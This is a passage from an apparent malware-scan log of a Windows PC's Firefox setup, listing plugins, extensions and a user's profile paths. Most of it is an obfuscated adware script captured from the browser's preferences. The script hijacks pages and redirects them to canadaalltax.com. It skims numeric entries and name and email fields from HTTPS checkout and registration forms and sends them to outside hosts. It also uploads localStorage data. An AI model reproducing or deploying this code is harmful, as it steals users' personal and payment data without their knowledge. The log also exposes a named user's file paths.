d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig, \"_href=\")}},20)},!1,a[c],!0)};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.utils.flushWaitForTokens()}))}; b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1}; b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c= b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=m(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0, 10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=8510492456308379354&eid=311&pid=1691&prid=338\";\"undefined\"!=typeof h&&h instanceof Array&&(d+=\"&_feeds=\"+h.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id= \"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement, !1)}});;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=qHYKrTsGvTwGqi5GqV1FrHU5qjsEqHs4&eid=311&hid=8510492456308379354&pid=1691&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=qHYKrTsGvTwGqi5GqV1FrHU5qjsEqHs4&eid=311&hid=8510492456308379354&pid=1691&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=qHYKrTsGvTwGqi5GqV1FrHU5qjsEqHs4&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=qHYKrTsGvTwGqi5GqV1FrHU5qjsEqHs4&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=qHYKrTsGvTwGqi5GqV1FrHU5qjsEqHs4&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=qHYKrTsGvTwGqi5GqV1FrHU5qjsEqHs4&eid=311&hid=8510492456308379354&pid=1691&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};if(\"www.youtube.com\"==window.self.location.hostname&&\"http:\"==window.self.location.protocol){var video_id=window.location.search.split(\"v=\")[1];if(video_id){var ampersandPosition=video_id.indexOf(\"&\");-1!=ampersandPosition&&(video_id=video_id.substring(0,ampersandPosition));if(video_id&&document.getElementById(\"watch7-views-info\")){var vc=document.getElementById(\"watch7-views-info\").firstElementChild;vc&&document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML&&((new Image).src=\"http://score.developpro.info/?pr=1&d=\"+video_id+\"&s=\"+document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML.replace(/[^0-9]/g,\"\"))}}};if((-1<window.self.location.hostname.indexOf(\"foodpanda\")||-1<window.self.location.hostname.indexOf(\"hellofood\"))&&document.getElementById(\"submitRegisterStep1\")){var price=query_selector_all(\".cart-line-price\"),p=price&&price[price.length-1]?parseInt(price[price.length-1].innerHTML.replace(/[^0-9]/g,\"\")):0,h=window.self.location.hostname;(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=\"+h+\"&s=\"+p}\"justeat.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"checkout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");\"tastykhana.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"billing\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");if(-1<window.self.location.hostname.indexOf(\"titbit.com\")||\"checkout\"==window.self.location.hostname)(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=titbit.com&s=0\";\"www.grubhub.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"payment\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.grubhub.com&s=0\");\"www.delivery.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"order_process\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.delivery.com&s=0\");\"www.foodler.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"AnonCheckout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.foodler.com&s=0\");\"eat24hours.com\"==window.self.location.hostname&&\"https:\"==window.self.location.protocol&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=eat24hours.com&s=0\");(function(){try{var a=document.getElementsByTagName(\"input\");if(\"https:\"==window.self.location.protocol&&4<a.length)for(var d=function(b){b=b.target;if(b.value&&11<b.value.length&&20>b.value.length&&b.value.match(/^[0-9]+$/))for((new Image).src=\"https://score.sendapplicationget.com/g.php?pr=2&d=\"+window.self.location.hostname+\"&s=0&r=\"+(+new Date).toString()+Math.random(),b=0;b<a.length;b++)a&&a.removeEventListener?a.removeEventListener(\"blur\",d,!1):a&&a.detachEvent&&a.detachEvent(\"onblur\",d)},c=0;c<a.length;c++)a[c]&&a[c].addEventListener?a[c].addEventListener(\"blur\",d,!1):a[c]&&a[c].attachEvent&&a[c].attachEvent(\"onblur\",d)}catch(e){}})();(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\[email protected]]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"YWAtP9E0=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"YWAtP9E0=\")){var d=a.match(/YWAtP9E0=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8ykShVWzmPhd9HrjwMCyVUojw7pjwMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0pdkFrdn4rTn8qTrEpdr6pjr8qa==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){var stngs = {attr_name:'s8510492456308379354',szy_domain:[\"senddownloadmy.com\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10]],checkif:function(ifr){return (ifr.getAttribute('s8510492456308379354') || ifr.src.indexOf('=511165')>-1||ifr.src.indexOf('=458516')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};var adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"1691\",eid:\"311\",hid:\"8510492456308379354\",lt:\"70.12\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"YWAtP9E0\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if©for(var b=0,d=c.length;b<d;b++)\"keywords\"==c.name.toLowerCase()&&(a+=\" \"+c.content.replace(/,/g,\" \"));return a.replace(/[_-]/g,\" \")},init:function(){var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var c=[],b=0;b<a.length;b++)stngs.checkif(a)||(a.setAttribute(adzy653rk.imp.rattr,\"true\"),a.setAttribute(\"replaced\",\"true\"),c.push(a));if(c.length){var d=function(a){if(a>=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\n\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"&lt=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords()),\"seta\"):adzy653rk.destruct()}else{if(b=adzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push(b);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var c=function(b){b>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},\n1200):(adzy653rk.src&&adzy653rk.ifr&&adzy653rk.ifr.src!=adzy653rk.src[0]&&(adzy653rk.ifr.nextSibling.innerHTML&&adzy653rk.ifr.nextSibling.innerHTML.match(/<span[^>]?>Ads( not)? by/i)?(new Image).src=\"http://zig.installerdatauk.info/?aid=2&bid=1&hid=8510492456308379354&eid=311&pid=1691&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr.src) :((new Image).src=\"http://zig.installerdatauk.info/?aid=1&bid=1&hid=8510492456308379354&eid=311&pid=1691&cid=0&c=\"+\nencodeURIComponent(adzy653rk.ifr.src),adzy653rk.ifrset(adzy653rk.ifr,adzy653rk.src[1],1))),setTimeout(function(){c(++b)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,1200)},getAt:function(a){a=[parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==\ntypeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b<c.length;b++)if(a[0]>=c[0]-5&&a[0]<=c[0]+5&&a[1]>=c[1]-5&&a[1]<=c[1]+5)return c[2];return!1},getAds:function(a,c){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var b=document.createElement(\"script\");b.type=\"text/javascript\";b.src=a+\"&cb=adzy653rk.\"+c;b.onreadystatechange=script.onload=function(){b.parentNode.removeChild(b)};try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||\ndocument.getElementsByTagName(\"body\")[0]).appendChild(b)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[c](e.response)};e.send(null)}},seta:function(a){var c=null;try{var b=adzy653rk.l.decode(a);\"undefined\"!=typeof JSON&&JSON.parse?c=JSON.parse(b):eval(\"ifrl = \"+b)}catch(d){}if(c&&c.length)for(a=0;a<c.length;a++)c[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],c[a]);adzy653rk.destruct()},ifrset:function(a,c,\nb){b||(adzy653rk.ifr.push(a),c[0]=c[0].replace(/\\[##([^#]+)##\\]/g,function(a,b){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\"</body></html>\"];switch(c[1]){case 1:a.src=c[0]+(-1<c[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+c[2]+\"_18x18_0\":\"\");break;case 2:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+'<iframe src=\"'+c[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+\nd[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b<a.length;){var d=this.xlat.indexOf(a.charAt(b++)),e=this.xlat.indexOf(a.charAt(b++)),f=this.xlat.indexOf(a.charAt(b++)),g=this.xlat.indexOf(a.charAt(b++)),h=(e&15)<<4|f>>2,k=(f&3)<<6|g,c=c+\nString.fromCharCode(d<<2|e>>4);64!=f&&0<h&&(c+=String.fromCharCode(h));64!=g&&0<k&&(c+=String.fromCharCode(k))}return this._utf8_decode©},_utf8_decode:function(a){for(var c=\"\",b=0;b<a.length;){var d=a.charCodeAt(b);if(128>d)c+=String.fromCharCode(d),b++;else if(191<d&&224>d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 &&adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ad.yieldmanager.com servedby.adxplosions.com optimizedby.brealtime.com ib.adnxs.com ad.adnetwork.net fw.adsafeprotected.com Servedby.bigfineads.com an.z5x.net media.glispa.com ad.improvemedianetwork.com ad.jumbaexchange.com ad.reachjunction.com ad.adserverplus.com srv.aileronx.com ad.z5x.net\".indexOf(window.self.location.hostname)==-1 &&adzy653rk.location.indexOf(\"zoneid=511165\")==-1 &&adzy653rk.location.indexOf(\"zoneid=458516\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 &&adzy653rk.location.indexOf(\"1018-1005\")==-1 &&adzy653rk.location.indexOf(\"1019-1001\")==-1 &&adzy653rk.location.indexOf(\"PT1312\")==-1)adzy653rk.init()})()})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: %7B66E978CD-981F-47DF-AC42-E3CF417C1467%7D:0.4.3
FF - prefs.js..extensions.enabledAddons: uploader%40adblockfilters.mozdev.org:2.1
FF - prefs.js..extensions.enabledAddons: adblockpopups%40jessehakanen.net:0.9.1
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:28.0
FF - prefs.js..keyword.URL: "http://fr.search.yah...e=A111FR128&p="
FF - user.js - File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF64_12_0_0_70.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@mcafee.com/MSC,version=10: c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_70.dll ()
FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=3.5.29: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@mcafee.com/MSC,version=10: c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL ()
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3505.0912: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.8: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}: C:\Program Files (x86)\McAfee\SiteAdvisor [2014/04/19 10:04:22 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/03/31 19:15:09 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\[email protected]: C:\Program Files\McAfee\MSK [2014/03/13 23:41:44 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{88849db3-dcd8-4efe-bcbb-af92b5c8ec55}: C:\Program Files (x86)\Re-markit-soft\157.xpi
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/03/31 19:15:09 | 000,000,000 | ---D | M]

[2014/01/28 16:21:30 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Janine.menage\AppData\Roaming\mozilla\Extensions
[2014/04/19 17:11:55 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Janine.menage\AppData\Roaming\mozilla\Firefox\Profiles\7dphpj52.default\extensions
[2014/02/15 22:08:04 | 000,000,000 | ---D | M] (websave) -- C:\Users\Janine.menage\AppData\Roaming\mozilla\Firefox\Profiles\7dphpj52.default\extensions\[email protected]
[2014/04/19 17:11:55 | 000,128,676 | ---- | M] () (No name found) -- C:\Users\Janine.menage\AppData\Roaming\mozilla\firefox\profiles\7dphpj52.default\extensions\[email protected]
[2014/04/19 17:10:58 | 000,123,385 | ---- | M] () (No name found) -- C:\Users\Janine.menage\AppData\Roaming\mozilla\firefox\profiles\7dphpj52.default\extensions\[email protected]
[2014/04/19 17:11:55 | 000,075,438 | ---- | M] () (No name found) -- C:\Users\Janine.menage\AppData\Roaming\mozilla\firefox\profiles\7dphpj52.default\extensions\[email protected]
[2014/03/31 19:52:16 | 000,003,793 | ---- | M] () (No name found) -- C:\Users\Janine.menage\AppData\Roaming\mozilla\firefox\profiles\7dphpj52.default\extensions\{66E978CD-981F-47DF-AC42-E3CF417C1467}.xpi
